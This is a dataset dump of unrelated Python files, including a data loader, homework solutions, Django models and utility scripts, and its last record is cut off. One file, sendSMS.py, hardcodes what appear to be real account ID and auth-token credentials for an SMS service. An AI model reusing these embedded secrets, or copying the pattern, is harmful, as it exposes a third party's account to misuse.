+{"seq_id":"266414416","text":"import sys\nsys.path.insert(0, '/home/vagrant/twosixcapital/gspread')\n\nimport pandas as pd\nimport numpy as np\nimport gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\nfrom oauth2client import tools\nimport pdb\n\nSCOPE = 'https://spreadsheets.google.com/feeds'\n\ndef get_credentials():\n    return ServiceAccountCredentials.from_json_keyfile_name('test-spreadsheet.json', SCOPE)\n\ndef df_to_sheets(df, spreadsheet_id, worksheet_id, column_header=True, row_header=True):\n\n    gc = gspread.authorize(get_credentials())\n    wks = getattr(gc.open(spreadsheet_id), worksheet_id.lower())\n\n    to_write = [x.split('|') for x in df.to_csv(sep='|').split('\\n')[:-1]]\n    max_cell = wks.get_addr_int(len(to_write), len(to_write[0]))\n    cell_range = wks.range('A1:{}'.format(max_cell))\n    cell_arr = np.array(cell_range).reshape(len(to_write), len(to_write[0]))\n\n    for row in range(len(cell_arr)):\n        for col in range(len(cell_arr[0])):\n            cell_arr[row, col].value = to_write[row][col]\n\n    wks.update_cells(list(cell_arr.flatten()))\n\n\nif __name__ == '__main__':\n    df = pd.DataFrame([[1,2,3], [4,5,6]], columns=['a', 'b', 'c']).set_index(['a', 'b'])\n    df.columns = [['d'], df.columns]\n\n    df_to_sheets(df, 'test', 'Sheet1')","sub_path":"sheets.py","file_name":"sheets.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"140842535","text":"\"\"\" \n\nExecutes the command sent to the program as per the\ndefined key map.\n\n\"\"\"\n\nimport os\nimport sys\nimport time\nfrom scankeys import PressKey, ReleaseKey\n\nscan_key_map = {\n\t'up': 0xC8,\n    'left': 0xCB,\n    'right': 0xCD,\n    'down': 0xD0,\n\n    'a': 0x1E,\n    'b': 0x30,\n\n    'start': 0x1F,\n    'select': 0x12\n}\n\ndef main(args):\n\tkey = args[0]\n\n\tif key in scan_key_map:\n\t\tPressKey(scan_key_map[key])\n\t\ttime.sleep(0.1)\n\t\tReleaseKey(scan_key_map[key])\n\nif __name__ == \"__main__\":\n\tmain(sys.argv[1:])","sub_path":"command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"130911643","text":"# -*- coding: utf-8 -*-\nfrom odoo import models, fields, api,_\nimport odoo.addons.decimal_precision as dp\nfrom odoo.exceptions import UserError\nfrom odoo.tools.safe_eval import safe_eval\n\n\nclass PurchaseOrderInherite(models.Model):\n    _inherit = \"purchase.order\"\n\n    @api.model\n    def create(self, vals):\n        print(\"vals :: \", vals)\n        if vals.get('name', 'New') == 'New':\n            seq_date = None\n            if 'date_order' in vals:\n                seq_date = fields.Datetime.context_timestamp(self, fields.Datetime.to_datetime(vals['date_order']))\n            print(\"vals['picking_type_id'] :: \", vals['picking_type_id'])\n            deliver_to = self.env['stock.picking.type'].search([('id', '=', vals['picking_type_id'])], limit=1)\n\n            v = self.env['ir.sequence'].next_by_code('purchase.order', 
sequence_date=seq_date) or '/'\n vals['name'] = str(deliver_to.warehouse_id.code) + '/' + v\n return super(PurchaseOrderInherite, self).create(vals)\n","sub_path":"nakham_change_seq/models/purchase_order.py","file_name":"purchase_order.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"205674121","text":"import os\nimport glob\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom gt_parser import gt_parser\nimport config as cf\n\nDataset_Debug_Display = False\n\nclass DataLoader():\n def __init__(self, phase='Train', shuffle=False):\n self.datas = []\n self.last_mb = 0\n self.phase = phase\n self.gt_count = [0 for _ in range(cf.Class_num)]\n self.prepare_datas(shuffle=shuffle)\n \n def prepare_datas(self, shuffle=True):\n if self.phase == 'Train':\n dir_paths = cf.Train_dirs\n elif self.phase == 'Test':\n dir_paths = cf.Test_dirs\n \n print('------------\\nData Load (phase: {})'.format(self.phase))\n \n for dir_path in dir_paths:\n files = []\n for ext in cf.File_extensions:\n files += glob.glob(dir_path + '/Images/*' + ext) \n load_count = 0\n for img_path in files:\n if cv2.imread(img_path) is None:\n continue\n gt_path = get_gt_image_path(img_path, phase=self.phase)\n data = {'img_path': img_path,\n 'gt_path': gt_path,\n 'h_flip': False,\n 'v_flip': False,\n 'rotate': False\n }\n self.datas.append(data)\n load_count += 1\n gts = gt_parser(gt_path)\n for gt in gts:\n # plus 1 (background)\n label = gt[-1].astype(np.int)\n self.gt_count[label] += 1\n print(' - {} - {} datas -> loaded {}'.format(dir_path, len(files), load_count))\n\n self.display_gt_statistic()\n if self.phase == 'Train':\n self.data_augmentation()\n self.display_gt_statistic()\n self.set_index(shuffle=shuffle)\n \n def display_gt_statistic(self):\n print(' -*- Training label -*-')\n print(' Total data: {}'.format(len(self.datas)))\n for i, gt in enumerate(self.gt_count):\n print(' - {} : {}'.format(cf.Class_label[i], gt))\n\n def get_data_num(self):\n return self.data_n\n \n def set_index(self, shuffle=True):\n self.data_n = len(self.datas)\n self.indices = np.arange(self.data_n)\n if shuffle:\n np.random.seed(cf.Random_seed)\n np.random.shuffle(self.indices)\n\n def get_minibatch_index(self, shuffle=False):\n if self.phase == 'Train':\n mb = cf.Minibatch\n elif self.phase == 'Test':\n mb = 1\n _last = self.last_mb + mb\n if _last >= self.data_n:\n mb_inds = self.indices[self.last_mb:]\n self.last_mb = _last - self.data_n\n if shuffle:\n np.random.seed(cf.Random_seed)\n np.random.shuffle(self.indices)\n _mb_inds = self.indices[:self.last_mb]\n mb_inds = np.hstack((mb_inds, _mb_inds))\n else:\n mb_inds = self.indices[self.last_mb : self.last_mb+mb]\n self.last_mb += mb\n self.mb_inds = mb_inds\n\n \n def get_minibatch(self, shuffle=True):\n if self.phase == 'Train':\n mb = cf.Minibatch\n elif self.phase == 'Test':\n mb = 1\n self.get_minibatch_index(shuffle=shuffle)\n\n \n imgs = np.zeros((mb, cf.Height, cf.Width, 3), dtype=np.float32)\n #gts = np.zeros((mb, cf.Class_num), dtype=np.float32)\n \n max_height = 0\n max_width = 0\n \n for i, ind in enumerate(self.mb_inds):\n data = self.datas[ind]\n img, img_info = load_image(data['img_path'])\n \n resize_h = 1. * img_info[\"rh\"] / img_info[\"h\"]\n resize_w = 1. 
* img_info[\"rw\"] / img_info[\"w\"]\n\n gt = gt_parser(data['gt_path'])\n gt[:, 0:4:2] *= resize_w\n gt[:, 1:4:2] *= resize_h\n # Add one, background\n gt[:, -1] += 1\n\n img = image_augment(img, data)\n gt = gt_augment(gt, data, img_info[\"rh\"], img_info[\"rw\"])\n \n max_height = max(max_height, img_info[\"rh\"])\n max_width = max(max_width, img_info[\"rw\"])\n\n #imgs[i, :img_info[\"rh\"], :img_info[\"rw\"]] = img\n imgs = np.expand_dims(img, axis=0)\n gts = gt\n\n if Dataset_Debug_Display:\n print(data['img_path'], data['h_flip'])\n fig, ax = plt.subplots()\n ax.imshow(imgs[i])\n for bbox in gts:\n ax.add_patch(plt.Rectangle(xy=[bbox[0], bbox[1]],\n width=(bbox[2]-bbox[0]),\n height=(bbox[3]-bbox[1]), fill=False) )\n plt.show()\n\n if cf.Input_type == 'channels_first':\n imgs = imgs.transpose(0, 2, 3, 1)\n return imgs, gts, img_info\n\n\n def data_augmentation(self):\n print(' | -*- Data Augmentation -*-')\n if cf.Horizontal_flip:\n self.add_horizontal_flip()\n print(' | - Added horizontal flip')\n if cf.Vertical_flip:\n self.add_vertical_flip()\n print(' | - Added vertival flip')\n if cf.Rotate_ccw90:\n self.add_rotate_ccw90()\n print(' | - Added Rotate ccw90')\n print(' \\/')\n \n def add_horizontal_flip(self):\n new_data = []\n for data in self.datas:\n _data = data.copy()\n _data['h_flip'] = True\n new_data.append(_data)\n self.datas.extend(new_data)\n\n def add_vertical_flip(self):\n new_data = []\n for data in self.datas:\n _data = data.copy()\n _data['v_flip'] = True\n new_data.append(_data)\n self.datas.extend(new_data)\n\n def add_rotate_ccw90(self):\n new_data = []\n for data in self.datas:\n _data = data.copy()\n _data['rotate'] = True\n new_data.append(_data)\n self.datas.extend(new_data)\n\n\n\ndef get_gt_image_path(img_name, phase='Train'):\n gt_path = img_name.replace('Images', 'Annotations').split('.')[0] + '.txt'\n if os.path.exists(gt_path):\n return gt_path\n raise Exception(\"file not found >>\", gt_path)\n if phase == 'Train':\n gt_dirs = cf.GT_dirs\n elif phase == 'Test':\n gt_dirs = cf.Test_GT_dirs\n for gt_dir in gt_dirs:\n gt_path = os.path.join(gt_dir, file_name) + '.txt'\n if os.path.exists(gt_path):\n return gt_path\n raise Exception('file not found ->', gt_path)\n \n \n## Below functions are for data augmentation\ndef load_image(img_name):\n img = cv2.imread(img_name)\n if img is None:\n raise Exception('file not found: {}'.format(img_name)) \n h, w = img.shape[:2]\n \"\"\"\n if cf.Variable_input:\n longer_side = np.max(img.shape[:2])\n scaled_ratio = 1. * cf.Max_side / longer_side\n rh = np.min([img.shape[0] * scaled_ratio, cf.Max_side]).astype(np.int)\n rw = np.min([img.shape[1] * scaled_ratio, cf.Max_side]).astype(np.int)\n img = cv2.resize(img, (rw, rh))\n rrh = h / rh\n rrw = w / rw\n else:\n rh = cf.Height\n rw = cf.Width\n img = cv2.resize(img, (rw, rh))\n rrh = h / rh\n rrw = w / rw\n \"\"\"\n min_side = min(h, w)\n max_side = max(h, w)\n\n ratio = 1. * cf.Min_side / min_side\n max_s = max_side * ratio\n if max_s > cf.Max_side:\n ratio = 1. * cf.Max_side / max_side\n rw = int(ratio * w)\n rh = int(ratio * h)\n img = cv2.resize(img, (rw, rh))\n rrh = 1. / ratio\n rrw = 1. 
/ ratio\n    \n    img = img[:, :, (2,1,0)]\n    img = img / 255.\n    img_info = {\"h\": h, \"w\": w, \"rh\":rh, \"rw\":rw, 'rrh':rrh, 'rrw':rrw}\n    return img, img_info\n\n\ndef image_augment(image, data):\n    if data['h_flip']:\n        image = image[:, ::-1]\n    if data['v_flip']:\n        image = image[::-1, :]\n    if data['rotate']:\n        h, w = image.shape[:2]  # h and w were previously undefined here (NameError)\n        max_side = max(h, w)\n        if len(image.shape) == 3:\n            frame = np.zeros((max_side, max_side, 3), dtype=np.float32)\n        elif len(image.shape) == 2:\n            frame = np.zeros((max_side, max_side), dtype=np.float32)\n        tx = int((max_side-w)/2)\n        ty = int((max_side-h)/2)\n        frame[ty:ty+h, tx:tx+w] = image\n        M = cv2.getRotationMatrix2D((max_side/2, max_side/2), 90, 1)\n        rot = cv2.warpAffine(frame, M, (max_side, max_side))\n        image = rot[tx:tx+w, ty:ty+h]\n    return image\n\n\ndef gt_augment(gt, data, h, w):\n    if data['h_flip']:\n        _gt = gt.copy()\n        gt[:, 0] = w - _gt[:, 2]\n        gt[:, 2] = w - _gt[:, 0]\n    if data['v_flip']:\n        _gt = gt.copy()\n        gt[:, 1] = h - _gt[:, 3]\n        gt[:, 3] = h - _gt[:, 1]\n    return gt\n","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":8871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"36882022","text":"import requests\nfrom colorama import Fore, Back, Style\n\nGITHUB_RELEASE_URL = \"https://api.github.com/repos/skyzh/canvas_grab/releases/latest\"\nVERSION = \"v1.3.11\"\n\n\ndef check_latest_version():\n    version_obj = {}\n    print()\n    try:\n        version_obj = requests.get(GITHUB_RELEASE_URL, timeout=3).json()\n    except Exception as e:\n        print(f\"{Fore.RED}Failed to check update.{Style.RESET_ALL} It's normal if you don't have a stable network connection.\")\n        print(f\"You may report the following message to developer: {e}\")\n        return\n    version = version_obj.get(\"tag_name\", \"unknown\")\n    if version != VERSION:\n        print(f\"You're using version {Fore.GREEN}{VERSION}{Style.RESET_ALL}, \"\n              f\"but the latest release is {Fore.GREEN}{version}{Style.RESET_ALL}.\")\n        print(f\"Please visit {Fore.BLUE}https://github.com/skyzh/canvas_grab/releases{Style.RESET_ALL} \"\n              \"to download the latest version.\")\n        print(version_obj.get(\"body\", \"\"))\n    else:\n        print(\"Just checked update. You're using latest version of canvas_grab. :)\")\n","sub_path":"version.py","file_name":"version.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"628494139","text":"# staticInferenceModule.py\n# ------------------------\n# Licensing Information: Please do not distribute or publish solutions to this\n# project. You are free to use and extend these projects for educational\n# purposes. The Pacman AI projects were developed at UC Berkeley, primarily by\n# John DeNero (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).\n# For more info, see http://inst.eecs.berkeley.edu/~cs188/sp09/pacman.html\n\nfrom util import *\nimport util\nimport random\nimport ghostbusters\n\nclass StaticInferenceModule:\n    \"\"\"\n    A static inference module must compute two quantities, conditioned on provided observations:\n    \n    -- The posterior distribution over ghost locations. This will be a distribution over tuples of\n       where the ghosts are. If there is only one ghost, this distribution will be over the\n       (singleton tuples of) the board locations. If there are two ghosts, this distribution will\n       assign a probability to each pair of locations, and so on. 
Since the ghosts are interchangeable,\n the probability for, say, ((0,1), (3,2)) will be the same as that for ((3,2), (0,1)).\n \n -- The posterior distribution over the readings at a location, given the existing readings. Be\n careful that your computation does the right thing when the 'new' location is actually in the\n existing observations, at which point the posterior should put probability one of the known\n reading.\n\n This is an abstract class, which you should not modify.\n \"\"\"\n \n def __init__(self, game):\n \"\"\"\n Inference modules know what game they are reasoning about.\n \"\"\"\n self.game = game\n \n def getGhostTupleDistributionGivenObservations(self, observations):\n \"\"\"\n Compute the distribution over ghost tuples, given the evidence.\n \n Note that the observations are given as a dictionary.\n \"\"\"\n util.raiseNotDefined()\n \n def getReadingDistributionGivenObservations(self, observations, newLocation):\n \"\"\"\n Compute the distribution over readings for the new location, given the\n current observations (given as a dictionary).\n \"\"\"\n util.raiseNotDefined()\n\nclass ExactStaticInferenceModule(StaticInferenceModule):\n \"\"\"\n You will implement an exact inference module for the static ghostbusters game.\n \n See the abstract 'StaticInferenceModule' class for descriptions of the methods.\n \n The current implementation below is broken, returning all uniform distributions.\n \"\"\"\n \n def getGhostTupleDistributionGivenObservations(self, observations):\n \"\"\"\n Here is some help...\n self.game.getGhostTuples() will give you a list of ghost tuples\n self.game.getInitialDistribution() will give you a distribution over\n ghost tuples; namely if you say p = s.g.gID() and t is tuple from\n getGhostTuples, then p[t] will be its probability\n self.game.getReadingDistributionGivenGhostTuple(t,s) will give you\n a distribution over readings (red, green, etc.) for the ghost tuple\n t and sensor location s\n\n What you want to do is create a Counter() that you will return. 
If this\n counter is called dist, then dist[t] should be the probability of a\n ghost at tuple t (where t is from getGhostTuples) given the observations.\n \"\"\"\n \n #print observations\n #print ''\n \"*** YOUR CODE HERE ***\"\n possibleGhostTuples = self.game.getGhostTuples()\n initial = self.game.getInitialDistribution()\n #print initial\n #print ''\n \n dist = initial.copy()\n \n for observedLoc in observations.keys():\n observedReading = observations[observedLoc]\n #print observedLoc\n for possibleGhostTuple in possibleGhostTuples:\n #print possibleGhostTuple\n readingDist = self.game.getReadingDistributionGivenGhostTuple(possibleGhostTuple, observedLoc)\n #print readingDist\n dist[possibleGhostTuple] = dist[possibleGhostTuple]*readingDist[observedReading]\n #print ''\n \n #print ''\n \n dist.normalize()\n #print dist\n \n return dist\n\n\n\n def getReadingDistributionGivenObservations(self, observations, newLocation):\n \"\"\"\n For this part, you want to return a counter dist, so that \n dist[r] is the probability of reading r (from ghostbusters.Readings.getReadings)\n given the observations and the proposed new location.\n\n You'll probably want to use getReadingDistributionGivenGhostTuple (as before),\n your own getGhostTupleDistributionGivenObservations to compute these probabilities.\n To iterate over relevant things, there's ghostbusters.Readings.getReadings() to\n look at all possible readings.\n \"\"\"\n\n \"*** YOUR CODE HERE ***\"\n ghDist = self.getGhostTupleDistributionGivenObservations(observations)\n readings = ghostbusters.Readings.getReadings()\n possGhostTups = self.game.getGhostTuples()\n dist = Counter()\n\n probGh = ghDist[(newLocation,)]\n\n # We want to evaluate P(R_{i,j} | {r}), the probability of sensing\n # some reading given previous observations. Thus, we look at every\n # observation and evaluate this probability\n for r in readings:\n for loc in possGhostTups:\n readDist = self.game.getReadingDistributionGivenGhostTuple(loc, newLocation)\n dist[r] += readDist[r] * ghDist[(loc,)]\n\n dist.normalize()\n\n return dist\n","sub_path":"5300/bayesnets/staticInferenceModuleb.py","file_name":"staticInferenceModuleb.py","file_ext":"py","file_size_in_byte":5335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"407628450","text":"'''\n1- Faça um programa que cadastre 5 produtos em uma lista estática heterogênia.\n Para cada produto deve ser cadastrado o código, preço e quantidade. 
Create the list,\n   then apply a discount rate (%) suggested by the owner to every product in the\n   list and display both the original list and the discounted list; for the\n   original list, show the cheapest product and the one with the lowest quantity,\n   and for the discounted list, the most expensive product and the one with the\n   highest quantity.\n'''\n\nquant = 3  # NOTE: the exercise statement above asks for 5 products\nprodutos = []\nprodutos_desconto = []\n\nclass Produtos:\n    def __init__(self, codigo=0, quantidade=0, preco=0.0):\n        self.codigo = codigo\n        self.quantidade = quantidade\n        self.preco = preco\n\n    def print_produto(self):\n        print(f\"Codigo: {self.codigo}\\tQuantidade: {self.quantidade}\\tPreço: {self.preco}\\n\")\n\n\ndef cadastrar_produtos():\n    for i in range(quant):\n        produtos.append(Produtos(int(input(f\"Digite código produto{i + 1}: \")),\n                                 int(input(f\"Digite quantidade produto{i + 1}: \")),\n                                 float(input(f\"Digite preço produto{i + 1}: \"))))\n        while not validar_codigo_produto(produtos[i].codigo, i):\n            print(\"Código já existe!\")\n            produtos[i].codigo = int(input(f\"Digite código produto{i + 1}: \"))\n        print(\"\\n\")\n\n        produtos_desconto.append(Produtos(produtos[i].codigo, produtos[i].quantidade, produtos[i].preco))\n\ndef validar_codigo_produto(codigo, range_i):\n    for i in range(range_i):\n        if produtos[i].codigo == codigo:\n            return False\n    return True\n\ndef printar_produtos(list_produtos):\n    for i in range(quant):\n        list_produtos[i].print_produto()\n\ndef get_taxa():\n    taxa = float(input(\"Digite a taxa de desconto: \"))\n    taxa /= 100\n    return taxa\n\ndef aplicar_desconto():\n    taxa = get_taxa()\n    for i in range(quant):\n        desconto = produtos_desconto[i].preco * taxa\n        produtos_desconto[i].preco -= desconto\n\ndef achar_barato_caro_menor_maior():\n\n    mais_caro = 0\n    maior_quant = 0\n    for i in range(quant):\n        if produtos_desconto[i].preco > mais_caro:\n            mais_caro = produtos_desconto[i].preco\n\n        if produtos_desconto[i].quantidade > maior_quant:\n            maior_quant = produtos_desconto[i].quantidade\n    print(f\"Na lista produtos_desconto o produto mais caro tem o valor: {mais_caro}\")\n    print(f\"Na lista produtos_desconto o produto maior quantidade tem: {maior_quant}\")\n    print(\"\\n\")\n\n    mais_barato = mais_caro+1\n    menor_quant = maior_quant+1\n    for i in range(quant):\n        if produtos[i].preco < mais_barato:\n            mais_barato = produtos[i].preco\n\n        if produtos[i].quantidade < menor_quant:\n            menor_quant = produtos[i].quantidade\n\n    print(f\"Na lista produtos o produto mais barato tem o valor: {mais_barato}\")\n    print(f\"Na lista produtos o produto menor quantidade tem: {menor_quant}\")\n\ncadastrar_produtos()\nprintar_produtos(produtos)\n\n\naplicar_desconto()\nprintar_produtos(produtos_desconto)\n\nachar_barato_caro_menor_maior()","sub_path":"exercicio-produto/produto.py","file_name":"produto.py","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"209989910","text":"from collections import deque\nfrom itertools import islice, chain, repeat\n\n\ndef window(numbers, n, *, fillvalue=None):\n    if n == 0:\n        return []\n\n    inumbers = iter(numbers)\n    window_ = deque(islice(chain(inumbers, repeat(fillvalue)), n), maxlen=n)\n    yield tuple(window_)\n    for num in inumbers:\n        window_.append(num)\n        yield tuple(window_)\n","sub_path":"pythonmorsels/window/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
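A quick usage sketch for the window() generator in the entry above (values here are illustrative):

    nums = [1, 2, 3, 4, 5]
    assert list(window(nums, 3)) == [(1, 2, 3), (2, 3, 4), (3, 4, 5)]
    # when n exceeds the input length, fillvalue pads a single window
    assert list(window(nums, 7, fillvalue=0)) == [(1, 2, 3, 4, 5, 0, 0)]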
+{"seq_id":"111288605","text":"#!/usr/local/bin/python3\n# coding: UTF-8\n# Author: David\n# Email: youchen.du@gmail.com\n# Created: 2017-01-18 09:12\n# Last modified: 2017-01-18 09:14\n# Filename: basic_feed.py\n# Description:\nimport tensorflow as tf\n\ninput1 = tf.placeholder(tf.float32)\ninput2 = tf.placeholder(tf.float32)\noutput = tf.mul(input1, input2)\n\nwith tf.Session() as sess:\n print(sess.run(output, feed_dict={input1:[7.], input2:[2.]}))\n","sub_path":"Machine Learning/Python/TensorFlow/basic_feed.py","file_name":"basic_feed.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"470543491","text":"\n\n#calss header\nclass _TRANSPIRE():\n\tdef __init__(self,): \n\t\tself.name = \"TRANSPIRE\"\n\t\tself.definitions = [u'If it transpires that something has happened, this previously secret or unknown fact becomes known: ', u'to happen: ', u'If a body or plant transpires, it loses water through its surface or skin.']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_transpire.py","file_name":"_transpire.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"161459622","text":"#!/usr/bin/python3\nclass Square:\n \"\"\"this is a class Square that defines a square\n Attributes:\n __size: Private instance attribute - size of square\n Args:\n size: size of square.\n \"\"\"\n def __init__(self, size=0):\n \"\"\"This is a function that use __init__ method to\n initialize the passing variables\n\n Attributes:\n __size: Private instance attribute - size of square\n Args:\n size: size of square\n Raises:\n TypeError: size must be an integer\n ValueError: size must be >= 0\n \"\"\"\n if isinstance(size, int):\n if size >= 0:\n self.__size = size\n else:\n raise ValueError(\"size must be >= 0\")\n else:\n raise TypeError(\"size must be an integer\")\n\n def area(self):\n \"\"\" This is a function calculate the area of a square\n Attributes:\n __size: Private instance attribute - size of square\n Args:\n size: size of square\n Returns:\n the result\n \"\"\"\n return self.__size ** 2\n","sub_path":"0x06-python-classes/3-square.py","file_name":"3-square.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"564627532","text":"import io\nimport gzip\n\nfrom six import string_types as basestring\n\n\nGzipFile = _GzipFile = gzip.GzipFile\ntry:\n import idzip\n GzipFile = idzip.IdzipFile\n has_idzip = True\nexcept (ImportError, AttributeError):\n GzipFile = gzip.GzipFile\n has_idzip = False\n\n\n# Do not register idzip with psims, indexing seems to corrupt file\n# try:\n# from psims import compression as psims_compression\n\n# if has_idzip:\n# psims_compression.register(GzipFile, 'gz', b'\\037\\213')\n# psims_compression.register(GzipFile, 'dz', b'\\037\\213')\n# except ImportError:\n# pass\n\n\nDEFAULT_BUFFER_SIZE = int(2e6)\n\n\ndef test_gzipped(f):\n \"\"\"Checks the first two bytes of the\n passed file for gzip magic numbers\n\n Parameters\n ----------\n f : file-like or path-like\n\n Returns\n -------\n bool\n \"\"\"\n if isinstance(f, basestring):\n f = io.open(f, 'rb')\n current = f.tell()\n f.seek(0)\n magic = f.read(2)\n 
f.seek(current)\n return magic == b'\\037\\213'\n\n\ndef starts_with_gz_magic(bytestring):\n return bytestring.startswith(b'\\037\\213')\n\n\ndef get_opener(f, buffer_size=None):\n if buffer_size is None:\n buffer_size = DEFAULT_BUFFER_SIZE\n if not hasattr(f, 'read'):\n f = io.open(f, 'rb')\n buffered_reader = io.BufferedReader(f, buffer_size)\n if test_gzipped(f):\n handle = GzipFile(fileobj=buffered_reader, mode='rb')\n else:\n handle = buffered_reader\n return handle\n","sub_path":"ms_deisotope/data_source/_compression.py","file_name":"_compression.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"300556337","text":"from django.db import models\nfrom django.contrib.auth.models import AbstractBaseUser\nfrom django.contrib.auth.models import PermissionsMixin\nfrom django.contrib.auth.models import BaseUserManager\nfrom django.utils.timezone import now\n\nclass UserManager(BaseUserManager):\n\n def create_user(self, username, email, name, password=None):\n \"\"\" Creacion nuevo usuario \"\"\"\n if not email:\n raise ValueError('Usuario debe tener Email')\n\n email = self.normalize_email(email)\n user = self.model(username=username, email=email, name=name)\n\n user.set_password(password)\n user.save(using=self._db)\n\n return user\n\n def create_superuser(self, username, email, name, password):\n \"\"\" Creacion super usuario \"\"\"\n user = self.create_user(username, email, name, password)\n\n user.is_superuser = True\n user.is_staff = True\n\n user.save(using=self._db)\n\n return user\n\nclass User(AbstractBaseUser, PermissionsMixin):\n\n username = models.CharField(\n max_length=150,\n unique=True\n )\n\n email = models.EmailField(\n max_length=255,\n unique=True\n )\n\n name = models.CharField(\n max_length=150\n )\n\n avatar = models.ImageField(\n verbose_name='Avatar',\n upload_to='users',\n null=True\n )\n\n is_active = models.BooleanField(\n default=True\n )\n\n is_staff = models.BooleanField(\n default=False\n )\n\n objects = UserManager()\n\n USERNAME_FIELD = 'username'\n REQUIRED_FIELDS = ['email','name']\n\n class Meta:\n verbose_name = 'Usuario'\n verbose_name_plural = 'Usuarios'\n\n def get_full_name(self):\n \"\"\" Obtener nombre completo \"\"\"\n return self.name\n\n def get_short_name(self):\n \"\"\" Obtener nombre corto \"\"\"\n return self.name\n\n def __str__(self):\n \"\"\" Retorna cadena representativa de usuario \"\"\"\n return self.get_full_name()\n\nclass DriverTrip( models.Model ):\n\n driver = models.ForeignKey(\n User,\n verbose_name='Conductor',\n on_delete=models.CASCADE)\n\n origen = models.CharField(\n verbose_name='Origen',\n max_length=500\n )\n\n destino = models.CharField(\n verbose_name='Destino',\n max_length=500\n )\n\n hora_salida = models.TimeField(\n verbose_name='Hora Salida'\n )\n\n fecha_salida = models.DateField(\n verbose_name='Fecha'\n )\n\n cantidad_pasajeros = models.IntegerField(\n verbose_name='Cantidad pasajeros',\n default=4\n )\n\n pasajeros = models.ManyToManyField(\n User,\n verbose_name='Pasajeros',\n related_name='usuario_pasajero'\n )\n\n class Meta:\n verbose_name = 'Viaje conductor'\n verbose_name_plural = 'Viajes conductores'\n","sub_path":"backend/api/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"411160975","text":"#coding=gbk\r\n\r\n#coding=utf-8\r\n\r\n#-*- coding: UTF-8 -*- \r\n\r\nfrom 
CCPRestSDK import REST\r\nimport ConfigParser\r\n\r\ndef sendTemplateSMS(to,datas,tempId):\r\n accountSid= '8a48b55150e162370150e6ad378825ac'; \r\n\r\n accountToken= 'c67a265e8ec14ff48bc14737a803d59e'; \r\n\r\n appId='8a48b55150e162370150e6ae3d5925c6'; \r\n\r\n serverIP='app.cloopen.com';\r\n\r\n serverPort='8883'; \r\n\r\n softVersion='2013-12-26';\r\n\r\n rest = REST(serverIP, serverPort, softVersion) \r\n rest.setAccount(accountSid, accountToken) \r\n rest.setAppId(appId)\r\n\r\n result = rest.sendTemplateSMS(to,datas,tempId) \r\n if result['statusCode'] == '000000':\r\n return True\r\n return False\r\n\r\n'''\r\nif __name__ == '__main__':\r\n sendTemplateSMS('15521057950', {'2', '8888'}, 1)\r\n'''","sub_path":"androidUtils/sendSMS.py","file_name":"sendSMS.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"32473966","text":"import re\nimport json\n\nfileOpen = open(\"doc_1.txt\", \"r\")\ntext = fileOpen.read()\n\nclass Citation:\n def __init__(self, title ,author, year):\n self.title = title\n self.author = author\n self.year = year\n\ncitations = re.split('\\n\\n',text)\n\ncitationList = []\nfor citation in citations:\n # get year\n year = re.findall('\\((?:19|20)[0-9][0-9]\\)',citation)\n authorCitation = re.split('\\((?:19|20)[0-9][0-9]\\)',citation)\n if len(year) == 0:\n authorCitation = re.split('[12]\\d{3}',citation) \n else:\n year = year[0][1:-1]\n\n # get author\n author = re.findall('[A-Z][A-Z|a-z]+\\,?\\s[A-Z][a-z]*\\s[A-Z][a-z]*\\.?|[A-Z][a-z]+\\,?\\s[A-Z][a-z]*\\.?|^[A-Z][a-z]+',authorCitation[0]) \n if len(author) > 1 :\n poped_item = 0\n for index in range(len(author)) :\n if ',' not in author[index-poped_item] and '.' not in author[index-poped_item]:\n author.pop(index-poped_item) \n poped_item +=1\n\n # get title\n title = re.findall('\\\".*\\\"', citation)\n if len(title) == 0 :\n if len(author) ==0 :\n title = re.findall('[A-Za-z,]{1,}\\s[A-Za-z, ]{0,}',authorCitation[0])[0] \n else:\n title = re.split(author[0], citation)[1]\n if ').' 
